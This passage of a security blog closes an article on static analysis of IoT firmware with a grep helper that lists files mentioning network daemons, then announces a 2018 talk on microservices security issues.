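    # -E: extended regex for the alternation, -R: recursive, -l: file names only
    grep -RlE 'telnetd|dropbear|utelnetd|httpd' "$1" 2>/dev/null
}

# usage (path is hypothetical): find_daemon_scripts ./cpio-root/etc
```

Each file it reports still has to be read by hand; as noted above, the hardcoded-credential logic only becomes visible through manual review.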


In this article on pentesting IoT via static analysis we have shown a simple step-by-step guide to manually approaching and analyzing an unknown firmware. In particular, we have discussed three different approaches to static firmware analysis (manual, automated and fully automated) through practical examples. Lastly, we have highlighted how static analysis can be useful in finding a specific class of vulnerabilities.
The guide will continue in a second article, where we will deep-dive into the dynamic analysis of the firmware.



Monday, July 30, 2018

Microservices Security: Dos and Don'ts


Last week we were invited to speak at an internal event/conference of a very large enterprise, and we decided to present an analysis of the most interesting microservices issues we found during Minded Security activities in recent years.

More and more enterprises are restructuring their development teams to replicate the agility and innovation of startups.
In the last few years, microservices have gained popularity for their ability to provide modularity, scalability and high availability, as well as to make it easier for smaller development teams to work in an agile way. But how do they deal with security? What about security contexts?
This talk gives insights into the most interesting issues found in recent years while testing the security of multilayered microservices solutions, and how they were fixed.

Direct link to the presentation